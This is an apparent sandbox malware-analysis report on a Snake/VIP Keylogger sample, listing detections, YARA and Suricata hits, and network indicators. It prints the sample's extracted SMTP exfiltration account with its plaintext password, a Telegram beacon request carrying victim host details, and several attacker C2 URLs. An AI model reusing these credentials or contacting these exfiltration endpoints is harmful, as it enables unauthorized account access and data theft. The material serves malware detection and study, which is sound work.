
Windows Analysis Report
1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe

Overview

General Information

Sample name: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Analysis ID: 1520417
MD5: b046211fe3f420a9ceb7663a560ece96
SHA1: 785a1cff39f2a75cbfffed3d718e9e026b3c80a1
SHA256: 96134c810750cc56e372551f8070f06aee80ae0cc8eeac983502d6b8f66c77df
Tags: base64-decoded, exe, user-abuse_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Extracted malware configuration. Both extractors recovered the same exfiltration account: stolen data is sent over SMTP (submission port 587) to mail.lamela.si, authenticating as info@lamela.si. These are attacker-controlled mailbox credentials recovered from the sample's configuration, which is what makes them useful for abuse reports and for blocking the host at the mail gateway; the Telegram sendMessage request seen under Networking is a separate notification channel.
VIP Keylogger: {"Exfil Mode": "SMTP", "Email ID": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}
Snake Keylogger: {"Exfil Mode": "SMTP", "Username": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}
Yara matches on the submitted sample

Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
  Rule: JoeSecurity_CredentialStealer - Yara detected Credential Stealer (author: Joe Security)
  Rule: JoeSecurity_GenericDownloader_1 - Yara detected Generic Downloader (author: Joe Security)
  Rule: JoeSecurity_VIPKeylogger - Yara detected VIP Keylogger (author: Joe Security)
  Rule: JoeSecurity_TelegramRAT - Yara detected Telegram RAT (author: Joe Security)
  Rule: Windows_Trojan_SnakeKeylogger_af3faa65 - description: unknown, author: unknown. Matched strings:
    0x2e5e6:$a1: get_encryptedPassword
    0x2e8ea:$a2: get_encryptedUsername
    0x2e404:$a3: get_timePasswordChanged
    0x2e4ff:$a4: get_passwordField
    0x2e5fc:$a5: set_encryptedPassword
    0x2fc88:$a7: get_logins
    0x2fbeb:$a10: KeyLoggerEventArgs
    0x2f850:$a11: KeyLoggerEventArgsEventHandler

Yara matches on process memory dumps

Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp
  Rule: JoeSecurity_CredentialStealer - Yara detected Credential Stealer (author: Joe Security)
  Rule: JoeSecurity_VIPKeylogger - Yara detected VIP Keylogger (author: Joe Security)
  Rule: JoeSecurity_TelegramRAT - Yara detected Telegram RAT (author: Joe Security)
  Rule: Windows_Trojan_SnakeKeylogger_af3faa65 - description: unknown, author: unknown. Matched strings:
    0x2e3e6:$a1: get_encryptedPassword
    0x2e6ea:$a2: get_encryptedUsername
    0x2e204:$a3: get_timePasswordChanged
    0x2e2ff:$a4: get_passwordField
    0x2e3fc:$a5: set_encryptedPassword
    0x2fa88:$a7: get_logins
    0x2f9eb:$a10: KeyLoggerEventArgs
    0x2f650:$a11: KeyLoggerEventArgsEventHandler
  Every string sits exactly 0x200 bytes lower in this dump than in the file on disk. The dump starts at 0x702000, i.e. 0x2000 into the image loaded at 0x700000, which is consistent with the usual .NET PE layout of a .text section stored at raw offset 0x200 and mapped at RVA 0x2000: the strings are the same metadata, not a second copy.

Source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_SnakeKeylogger - Yara detected Snake Keylogger (author: Joe Security)

Yara matches on unpacked PE files

Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack
  Rule: JoeSecurity_CredentialStealer - Yara detected Credential Stealer (author: Joe Security)
  Rule: JoeSecurity_GenericDownloader_1 - Yara detected Generic Downloader (author: Joe Security)
  Rule: JoeSecurity_VIPKeylogger - Yara detected VIP Keylogger (author: Joe Security)
  Rule: JoeSecurity_TelegramRAT - Yara detected Telegram RAT (author: Joe Security)
  Rule: Windows_Trojan_SnakeKeylogger_af3faa65 - description: unknown, author: unknown. Matched strings:
    0x2e5e6:$a1: get_encryptedPassword
    0x2e8ea:$a2: get_encryptedUsername
    0x2e404:$a3: get_timePasswordChanged
    0x2e4ff:$a4: get_passwordField
    0x2e5fc:$a5: set_encryptedPassword
    0x2fc88:$a7: get_logins
    0x2fbeb:$a10: KeyLoggerEventArgs
    0x2f850:$a11: KeyLoggerEventArgsEventHandler
                          No Sigma rule has matched
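The Windows_Trojan_SnakeKeylogger_af3faa65 hits above are plain string matches on .NET method and type names. The following is an added example, not part of the Joe Sandbox report and not the Elastic rule's own source: it re-checks those same eight indicator strings against a byte buffer the way a YARA scan does (ASCII and UTF-16LE forms), and renders hits in the report's "0x....:$aN: name" form so they can be compared against the offsets listed above. The rule's real condition is not shown on this page, so the 5-of-8 threshold is an assumption, and the two sample buffers are constructed stand-ins for a .NET #Strings heap, not bytes from the sample.

```python
"""Re-check the Snake Keylogger string indicators the way a YARA scan would.

Added example; the indicator list is the subset printed in the report and the
THRESHOLD is an assumption (the real rule's condition is not on the page).
"""
import re

# .NET method/type names the Yara rule hit on, copied from the report's string list.
INDICATORS = {
    "$a1": b"get_encryptedPassword",
    "$a2": b"get_encryptedUsername",
    "$a3": b"get_timePasswordChanged",
    "$a4": b"get_passwordField",
    "$a5": b"set_encryptedPassword",
    "$a7": b"get_logins",
    "$a10": b"KeyLoggerEventArgs",
    "$a11": b"KeyLoggerEventArgsEventHandler",
}
THRESHOLD = 5  # assumption: "5 of them"; the real rule's condition is not shown

# Constructed stand-ins for a .NET #Strings heap (NUL-separated names).
# Not bytes taken from the real sample.
POSITIVE = b"\x00".join([
    b"get_Name", b"get_encryptedPassword", b"get_encryptedUsername",
    b"get_timePasswordChanged", b"get_passwordField", b"set_encryptedPassword",
    b"get_logins", b"KeyLoggerEventArgsEventHandler", b"ToString",
])
BENIGN = b"\x00".join([b"get_Name", b"set_Name", b"get_Password",
                       b"KeyPressEventArgs", b"ToString"])


def scan(buf: bytes) -> dict:
    """Return {indicator: sorted offsets} for each indicator found as ASCII or UTF-16LE.

    Like YARA, overlapping indicators both count: $a11 contains $a10, so any
    $a11 hit also produces a $a10 hit at the same offset.
    """
    hits = {}
    for name, ascii_form in INDICATORS.items():
        wide_form = ascii_form.decode("ascii").encode("utf-16-le")
        offsets = [m.start() for pattern in (ascii_form, wide_form)
                   for m in re.finditer(re.escape(pattern), buf)]
        if offsets:
            hits[name] = sorted(offsets)
    return hits


def is_match(buf: bytes) -> bool:
    """True when at least THRESHOLD distinct indicators are present."""
    return len(scan(buf)) >= THRESHOLD


def report_lines(buf: bytes) -> list:
    """Render hits in the report's form, e.g. '0x2e5e6:$a1: get_encryptedPassword'."""
    rows = [(off, name) for name, offs in scan(buf).items() for off in offs]
    return [f"0x{off:x}:{name}: {INDICATORS[name].decode()}"
            for off, name in sorted(rows)]


if __name__ == "__main__":
    for label, buf in (("constructed positive", POSITIVE), ("constructed benign", BENIGN)):
        print(f"{label}: match={is_match(buf)}")
        for line in report_lines(buf):
            print("  " + line)
```

To run it against a real file, read the bytes and call `report_lines(data)`; offsets will be file offsets, so expect the 0x200 shift relative to a memory dump noted above.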
Suricata IDS alerts, SID 2803305 (severity 3, "ETPRO MALWARE Common Downloader Header Pattern H"); these are the TLS connections to 188.114.97.3 (CLOUDFLARENETUS):

Timestamp                        SID      Sev  Classtype        Source IP    Src port  Destination IP  Dst port  Proto
2024-09-27T10:47:31.786222+0200  2803305  3    Unknown Traffic  192.168.2.7  49701     188.114.97.3    443       TCP
2024-09-27T10:47:32.974719+0200  2803305  3    Unknown Traffic  192.168.2.7  49703     188.114.97.3    443       TCP
2024-09-27T10:47:34.175636+0200  2803305  3    Unknown Traffic  192.168.2.7  49705     188.114.97.3    443       TCP
2024-09-27T10:47:38.978463+0200  2803305  3    Unknown Traffic  192.168.2.7  49713     188.114.97.3    443       TCP

Suricata IDS alerts, SID 2803274 (severity 2, "ETPRO MALWARE Common Downloader Header Pattern UH"); these are the plaintext HTTP connections to 158.101.44.242:

Timestamp                        SID      Sev  Classtype                Source IP    Src port  Destination IP  Dst port  Proto
2024-09-27T10:47:30.112737+0200  2803274  2    Potentially Bad Traffic  192.168.2.7  49699     158.101.44.242  80        TCP
2024-09-27T10:47:31.175032+0200  2803274  2    Potentially Bad Traffic  192.168.2.7  49699     158.101.44.242  80        TCP
2024-09-27T10:47:32.424999+0200  2803274  2    Potentially Bad Traffic  192.168.2.7  49702     158.101.44.242  80        TCP

Both signatures key on header patterns shared by many downloaders, which is why Suricata rates them low; the family-specific evidence is the host and User-Agent combination listed under Networking.


AV Detection

Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Avira: detected
Source: http://aborters.duckdns.org:8081 | URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 | URL Reputation: Label: malware
Source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | ReversingLabs: Detection: 65%
Source: Submitted sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org

Static PE information and TLS findings (signatures "Uses 32bit PE files" and "Uses insecure TLS / SSL version for HTTPS connection"):
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2

Debug-symbol (PDB) paths found in the binary's memory and in the WER crash dump (WER1929.tmp.dmp); all of them belong to .NET framework assemblies, which identifies the sample as a .NET executable rather than revealing a build path of the malware itself:
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006248000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdbP source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.pdbh source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Security.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.pdbMZ source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: Microsoft.VisualBasic.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Web.Extensions.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.000000000625D000.00000004.00000020.00020000.00000000.sdmp, WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.00000000061DE000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb\t source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdbSystem.ni.dllp source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
Found inlined nop instructions (likely shell or obfuscated code). Source for every entry: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe. Note that the 0x0670xxxx addresses lie in dynamically allocated code of a .NET process, where JIT output routinely contains nop padding, so this signature is weak evidence on its own:
Code function 0_2_00ECF62F: 4x nop then jmp 00ECF8E9h
Code function 0_2_00ECFA88: 4x nop then jmp 00ECFD41h
Code function 0_2_067020A8: 4x nop then jmp 067024C0h
Code function 0_2_06701970: 4x nop then jmp 06701C21h
Code function 0_2_0670E950: 4x nop then jmp 0670EBF9h
Code function 0_2_06700673: 4x nop then mov dword ptr [ebp-14h], 00000000h
Code function 0_2_0670F658: 4x nop then jmp 0670F901h
Code function 0_2_0670C690: 4x nop then jmp 0670C939h
Code function 0_2_0670D7F0: 4x nop then jmp 0670DA99h
Code function 0_2_0670E4F8: 4x nop then jmp 0670E7A1h
Code function 0_2_0670C238: 4x nop then jmp 0670C4E1h
Code function 0_2_0670F200: 4x nop then jmp 0670F4A9h
Code function 0_2_067023EE: 4x nop then jmp 067024C0h
Code function 0_2_0670D398: 4x nop then jmp 0670D641h
Code function 0_2_06700040: 4x nop then mov dword ptr [ebp-14h], 00000000h
Code function 0_2_0670E0A0: 4x nop then jmp 0670E349h
Code function 0_2_0670CF40: 4x nop then jmp 0670D1E9h
Code function 0_2_0670DC48: 4x nop then jmp 0670DEF1h
Code function 0_2_0670BDE0: 4x nop then jmp 0670C089h
Code function 0_2_0670EDA8: 4x nop then jmp 0670F051h
Code function 0_2_0670CAE8: 4x nop then jmp 0670CD91h
Code function 0_2_0670FAB0: 4x nop then jmp 0670FD59h
Code function 0_2_06700853: 4x nop then mov dword ptr [ebp-14h], 00000000h

                          Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected (9 requests, 5 of them with Connection: Keep-Alive, none with a User-Agent header): GET /xml/8.46.123.33 HTTP/1.1  Host: reallyfreegeoip.org
  8.46.123.33 is presumably the sandbox's public address as returned by the preceding checkip.dyndns.org request; the XML response supplies the "Country Name" that appears in the Telegram message below.
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2027/09/2024%20/%2015:33:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1  Host: api.telegram.org  Connection: Keep-Alive
  Decoded text: "PC Name:642294 / Date and Time: 27/09/2024 / 15:33:28 / Country Name: United States / [ 642294 Clicked on the File If you see nothing this's mean the system storage's empty. ]". Both the bot token (the path segment after /bot) and chat_id are empty in this request, so the beacon could not have reached a Telegram chat in this run; the 404 response recorded further below is consistent with that.
Source: Joe Sandbox View | IP Address: 149.154.167.220 (ASN TELEGRAMRU)
Source: Joe Sandbox View | IP Address: 188.114.97.3 (ASN CLOUDFLARENETUS)
Source: Joe Sandbox View | IP Address: 158.101.44.242
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49705 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49713 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected (10 requests, 7 of them with Connection: Keep-Alive): GET / HTTP/1.1  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)  Host: checkip.dyndns.org
  The fixed, long-obsolete User-Agent on a Windows 10 host is a better detection pivot than the destination alone, since checkip.dyndns.org is also used by legitimate software.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 times)
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found  Server: nginx/1.18.0  Date: Fri, 27 Sep 2024 08:47:41 GMT  Content-Type: application/json  Content-Length: 55  Connection: close  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload  Access-Control-Allow-Origin: *  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | String found in binary or memory: http://aborters.duckdns.org:8081
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | String found in binary or memory: http://checkip.dyndns.org/q
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.12.dr | String found in binary or memory: http://upx.sf.net
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | String found in binary or memory: http://varders.kozow.com:8081
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | String found in binary or memory: https://api.telegram.org/bot
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C08000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enXL
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
